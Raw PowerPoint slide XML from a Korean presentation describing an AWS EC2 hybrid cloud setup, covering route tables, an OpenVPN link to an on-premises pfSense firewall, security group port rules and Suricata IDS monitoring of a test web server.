            <a:srgbClr val="34D399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5" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6755082" y="4914248"/>
            <a:ext cx="235504" cy="247802"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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6" name="Image 7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25180" y="4971398"/>
            <a:ext cx="100254" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Text 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7078170" y="4922932"/>
            <a:ext cx="2279448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라우팅 테이블 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Text 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6770521" y="5237944"/>
            <a:ext cx="2504992" cy="87934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- Public Route Table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 - 0.0.0.0/0 → Internet Gateway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 -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외부 통신이 필요한 퍼블릭 서브넷에만 적용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- Private Route Table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 -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기본적으로 외부 인터넷 경로 없음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 -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내부 통신 및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기반 접근만 허용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Shape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9508387" y="4761541"/>
            <a:ext cx="2104491" cy="1757172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0" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9508386" y="4761541"/>
            <a:ext cx="48159" cy="1757172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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1" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9683114" y="4913332"/>
            <a:ext cx="226801" cy="232412"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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" name="Image 8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757293" y="4962755"/>
            <a:ext cx="78442" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Text 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10060683" y="4927047"/>
            <a:ext cx="122910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네트워크 연결</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9698582" y="5237028"/>
            <a:ext cx="1828953" cy="83149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- Internet Gateway(IGW)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연결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 -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퍼블릭 서브넷을 통해 외부 사용자 및 원격 관리자 접근 가능</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l"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-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온프레미스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(pfSense)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와는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VPN(OpenVPN)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기반 연결 구조로 설계</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="512850" y="1603007"/>
            <a:ext cx="11149318" cy="3008997"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7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71499" y="1653278"/>
            <a:ext cx="11041380" cy="29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1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71500" y="381305"/>
            <a:ext cx="571500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571500" y="1047902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하이브리드 클라우드 연결 및 관리자 보안 접근 아키텍처</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="533095"/>
            <a:ext cx="3363163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EC2 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1478585"/>
            <a:ext cx="5087620" cy="884223"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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0567" y="1638298"/>
            <a:ext cx="248321" cy="248321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1361135" y="1934453"/>
            <a:ext cx="4239565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해당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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EC2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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인스턴스는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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웹 서비스 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="11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보안 로그 수집 허브 역할을 수행한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="11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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1361135" y="1607921"/>
            <a:ext cx="3931578" cy="18463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EC2 </a:t>
            </a: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인스턴스 역할</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5852058" y="1478585"/>
            <a:ext cx="2664415" cy="885471"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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 rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix amt="80000"/>
            <a:biLevel thresh="50000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6033269" y="1622715"/>
            <a:ext cx="214237" cy="211539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470149" y="1916224"/>
            <a:ext cx="1724574" cy="4389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외부 관리자 및 원격 접속 허용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470149" y="1617125"/>
            <a:ext cx="1778203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퍼블릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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IPv4 </a:t>
            </a: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주소 할당</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709412" y="1478585"/>
            <a:ext cx="2857748" cy="885471"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9406185" y="1919380"/>
            <a:ext cx="1774959" cy="4389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10.200.6.58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VPC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 통신에 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9406185" y="1620281"/>
            <a:ext cx="1833315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프라이빗 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="150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 rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:biLevel thresh="50000"/>
          </a:blip>
          <a:srcRect l="-80" r="-80"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8920582" y="1627849"/>
            <a:ext cx="262370" cy="20956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28062" y="2452028"/>
            <a:ext cx="11092438" cy="4087837"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8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7" name="그림 6" descr="텍스트, 폰트, 번호, 소프트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1500" y="2488670"/>
            <a:ext cx="10995660" cy="40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3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71500" y="381305"/>
            <a:ext cx="571500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571500" y="1047902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하이브리드 클라우드 연결 및 관리자 보안 접근 아키텍처</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="533095"/>
            <a:ext cx="3363163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EC2 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9116402" y="1574176"/>
            <a:ext cx="2809951" cy="3412210"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1744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Shape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9131669" y="1578376"/>
            <a:ext cx="2794684" cy="42291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F97316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Shape 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9124400" y="2371653"/>
            <a:ext cx="2794684" cy="10069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Text 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9692207" y="1880867"/>
            <a:ext cx="1597585" cy="19812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인바운드 규칙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9275621" y="2537650"/>
            <a:ext cx="2491514" cy="432634"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18741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" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9525289" y="2771070"/>
            <a:ext cx="916550" cy="15857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관리자 원격 접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278097" y="3728413"/>
            <a:ext cx="2491514" cy="443316"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18741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Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9558001" y="3994399"/>
            <a:ext cx="1670218" cy="177329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암호화된 웹 통신</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278097" y="4338729"/>
            <a:ext cx="2491514" cy="485401"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18741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3" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9523112" y="4621283"/>
            <a:ext cx="2052148" cy="17733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pfSense ↔ AWS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간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터널링</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9522152" y="2578868"/>
            <a:ext cx="919686" cy="15857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1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TCP 22 (SSH)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9558001" y="3782134"/>
            <a:ext cx="1291923" cy="17733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1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TCP 443 (HTTPS)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" b="1">
              <a:solidFill>
                <a:srgbClr val="F1F5F9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26" name="Text 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9549654" y="4409264"/>
            <a:ext cx="1674851" cy="17733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1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UDP 1194 (OpenVPN)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278097" y="3139939"/>
            <a:ext cx="2491514" cy="419589"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18741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1" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9523112" y="3379444"/>
            <a:ext cx="1625627" cy="15797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웹 서비스 제공</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9533515" y="3181363"/>
            <a:ext cx="1261810" cy="16211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1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TCP 80 (HTTP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571501" y="5215782"/>
            <a:ext cx="11354852" cy="1181235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5" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="5215782"/>
            <a:ext cx="45719" cy="1181235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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6" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761696" y="5316292"/>
            <a:ext cx="326059" cy="323696"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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7" name="Image 7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234" y="5388224"/>
            <a:ext cx="133211" cy="177389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232101" y="5354239"/>
            <a:ext cx="2279448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아웃바운드 규칙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9216390" y="1811067"/>
            <a:ext cx="341611" cy="323696"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F97316">
              <a:alpha val="21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324965" y="1887653"/>
            <a:ext cx="133211" cy="177389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761696" y="5740497"/>
            <a:ext cx="3294684" cy="584407"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18741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3" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="6012483"/>
            <a:ext cx="2885440" cy="214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업데이트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로그 전송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외부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API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통신 등 정상 동작 보장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139864" y="5820281"/>
            <a:ext cx="1035204" cy="21419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전체 트래픽 허용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="523776" y="1534824"/>
            <a:ext cx="8413542" cy="3488754"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7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8" name="그림 7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rcRect r="13710"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1574176"/>
            <a:ext cx="8328660" cy="341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68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71500" y="381305"/>
            <a:ext cx="571500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571500" y="1047902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하이브리드 클라우드 연결 및 관리자 보안 접근 아키텍처</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="533095"/>
            <a:ext cx="3363163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EC2 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9282234" y="1477703"/>
            <a:ext cx="2608784" cy="2521273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5" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="10563764" y="202296"/>
            <a:ext cx="45719" cy="2608784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6" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9457493" y="1724859"/>
            <a:ext cx="242767" cy="247802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9520125" y="1789705"/>
            <a:ext cx="117501" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9834531" y="1761902"/>
            <a:ext cx="1979065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웹 서버 구성 개요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9472429" y="2121913"/>
            <a:ext cx="2418588" cy="1336049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AWS EC2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인스턴스에 웹 서버를 구축하여 외부 접근 테스트 및 보안 탐지 대상 서비스로 활용</a:t>
            </a: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공인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IP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기반 서비스 제공</a:t>
            </a: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인터넷 상 어디서든 접속 가능</a:t>
            </a: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웹 서버 접근 트래픽은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Suricata IDS/IPS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를 통해 탐지 및 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9303729" y="4113535"/>
            <a:ext cx="2608784" cy="2282243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" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9851242" y="4284021"/>
            <a:ext cx="1979065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웹 서비스 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9461205" y="4284021"/>
            <a:ext cx="239055" cy="247802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2" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9472428" y="4695788"/>
            <a:ext cx="2341168" cy="100206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AWS EC2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에 구축된 웹 서버에 공인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IP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를 통해 정상 접속됨을 확인</a:t>
            </a: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해당 화면은 외부 사용자 관점에서 서비스가 정상적으로 노출되고 있음을 보여줌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="90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 rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-80" r="-80"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9505980" y="4343539"/>
            <a:ext cx="156922" cy="125337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="10585261" y="2848668"/>
            <a:ext cx="45719" cy="2608784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08866" y="1427524"/>
            <a:ext cx="8660591" cy="5008836"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12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" name="그림 10" descr="텍스트, 스크린샷, 폰트, 소프트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1500" y="1486814"/>
            <a:ext cx="8557260" cy="49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6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571500" y="1047902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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>AWS EC2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>인스턴스 접근 환경 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="533095"/>
            <a:ext cx="3363163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</a:rPr>
              <a:t>AWS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</a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" b="1" kern="0" spc="-67">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>EC2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</a:rPr>
              <a:t> 원격 접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087304" y="1477704"/>
            <a:ext cx="4803714" cy="1341696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5" name="Shape 31"/>
